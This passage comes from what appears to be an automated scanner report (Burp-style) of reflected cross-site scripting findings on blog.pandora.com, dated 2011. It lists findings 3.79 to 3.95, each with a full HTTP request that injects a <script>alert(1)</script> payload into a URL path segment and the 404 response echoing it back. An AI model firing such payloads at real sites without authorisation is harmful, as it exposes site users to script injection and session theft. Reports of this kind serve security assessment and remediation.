Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ was not found on this server.</p>
...[SNIP]...

3.79. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eab0<script>alert(1)</script>503e2b138de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ was not found on this server.</p>
...[SNIP]...

3.80. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7d2c<script>alert(1)</script>8f8c0843fd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ was not found on this server.</p>
...[SNIP]...

3.81. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fc20<script>alert(1)</script>d72027cb382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ was not found on this server.</p>
...[SNIP]...

3.82. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e051<script>alert(1)</script>cfbbd073882 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ was not found on this server.</p>
...[SNIP]...

3.83. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b74cd<script>alert(1)</script>9b829fedb43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ was not found on this server.</p>
...[SNIP]...

3.84. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4491<script>alert(1)</script>0e7243d947a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ was not found on this server.</p>
...[SNIP]...

3.85. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f27b<script>alert(1)</script>ff6cdc57baa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ was not found on this server.</p>
...[SNIP]...

3.86. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b166<script>alert(1)</script>c595edeaf7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ was not found on this server.</p>
...[SNIP]...

3.87. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d7d6<script>alert(1)</script>9c1bb7f29d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ was not found on this server.</p>
...[SNIP]...

3.88. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89734<script>alert(1)</script>10ad202e6f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ was not found on this server.</p>
...[SNIP]...

3.89. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 226ab<script>alert(1)</script>db94c5f4ab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ was not found on this server.</p>
...[SNIP]...

3.90. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7b27<script>alert(1)</script>e88437a6ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ was not found on this server.</p>
...[SNIP]...

3.91. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcf4c<script>alert(1)</script>158d11b266d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ was not found on this server.</p>
...[SNIP]...

3.92. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0649<script>alert(1)</script>9f0447f5c89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ was not found on this server.</p>
...[SNIP]...

3.93. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39608<script>alert(1)</script>520f9e495aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ was not found on this server.</p>
...[SNIP]...

3.94. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c6d<script>alert(1)</script>71c09bfa91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ was not found on this server.</p>
...[SNIP]...

3.95. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133b4<script>alert(1)</script>487daa5efe0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
